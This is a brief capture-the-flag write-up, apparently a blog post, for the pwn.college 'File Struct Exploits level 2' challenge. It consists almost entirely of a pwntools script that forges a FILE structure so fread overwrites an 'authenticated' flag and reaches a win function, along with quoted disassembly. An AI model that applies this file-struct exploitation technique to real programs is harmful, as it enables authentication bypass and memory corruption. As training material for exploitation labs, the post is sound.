Post

(File Struct Exploits) level 2

Posted
By hackeringtrue
1 min read
(File Struct Exploits) level 2

Information

  • category: pwn

Description

Harness the power of FILE structs to arbitrarily write data to bypass a security check.

Write-up

same previous but now in write.

Exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

from pwn import *

elf = context.binary = ELF("/challenge/babyfile_level2")
global p
p = elf.process()
"""
 0x0000000000401a38 <+165>:   mov    rdx,QWORD PTR [rip+0x27a9]        # 0x4041e8 <fp>
   0x0000000000401a3f <+172>:   mov    rax,QWORD PTR [rip+0x27aa]        # 0x4041f0 <buf>
   0x0000000000401a46 <+179>:   mov    rcx,rdx
   0x0000000000401a49 <+182>:   mov    edx,0x100
   0x0000000000401a4e <+187>:   mov    esi,0x1
   0x0000000000401a53 <+192>:   mov    rdi,rax
   0x0000000000401a56 <+195>:   call   0x401150 <fread@plt>
   0x0000000000401a5b <+200>:   mov    eax,DWORD PTR [rip+0x2797]        # 0x4041f8 <authenticated>
   0x0000000000401a61 <+206>:   test   eax,eax
   0x0000000000401a63 <+208>:   je     0x401a71 <challenge+222>
   0x0000000000401a65 <+210>:   mov    eax,0x0
   0x0000000000401a6a <+215>:   call   0x4012f6 <win>
   """
def exploit():
        fp = FileStructure()
        payload = fp.read(0x4041f8,260)
        p.send(payload)
        p.send(b"A"*260)
        p.interactive()

def main():
        exploit()

if __name__ == "__main__":
        main()
pwn.college, File-Struct-Exploits
pwn.college FSOP
This post is licensed under CC BY 4.0 by the author.